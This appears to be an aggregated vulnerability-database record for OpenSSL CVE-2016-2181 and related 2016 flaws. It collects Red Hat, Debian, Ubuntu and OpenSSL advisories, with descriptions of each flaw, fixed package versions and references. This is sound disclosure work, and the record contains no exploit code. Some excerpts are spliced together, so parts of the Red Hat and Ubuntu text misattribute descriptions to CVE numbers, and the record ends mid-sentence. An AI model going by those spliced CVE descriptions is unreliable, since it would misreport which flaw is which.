"@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The Anti-Replay feature in the DTLS implementation in OpenSSL before 1.1.0 mishandles early use of a new epoch number in conjunction with a large sequence number, which allows remote attackers to cause a denial of service (false-positive packet drops) via spoofed DTLS records, related to rec_layer_d1.c and ssl3_record.c. OpenSSL is prone to denial-of-service vulnerability. \nAn attacker may exploit this issue to cause a denial-of-service condition. \nVersions prior to OpenSSL 1.1.0 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. An attacker could\npossibly cause an application using OpenSSL to crash if it printed time\nstamp data from the attacker. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. \nThe fix was developed by Matt Caswell of the OpenSSL development team. \n\nCertificate message OOB reads (CVE-2016-6306)\n=============================================\n\nSeverity: Low\n\nIn OpenSSL 1.0.2 and earlier some missing message length checks can result in\nOOB reads of up to 2 bytes beyond an allocated buffer. There is a theoretical\nDoS risk but this has not been observed in practice on common platforms. \n\nThe messages affected are client certificate, client certificate request and\nserver certificate. As a result the attack can only be performed against\na client or a server which enables client authentication. \n\nOpenSSL 1.1.0 is not affected. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in tls_get_message_header() (CVE-2016-6307)\n==========================================================================\n\nSeverity: Low\n\nA TLS message includes 3 bytes for its length in the header for the 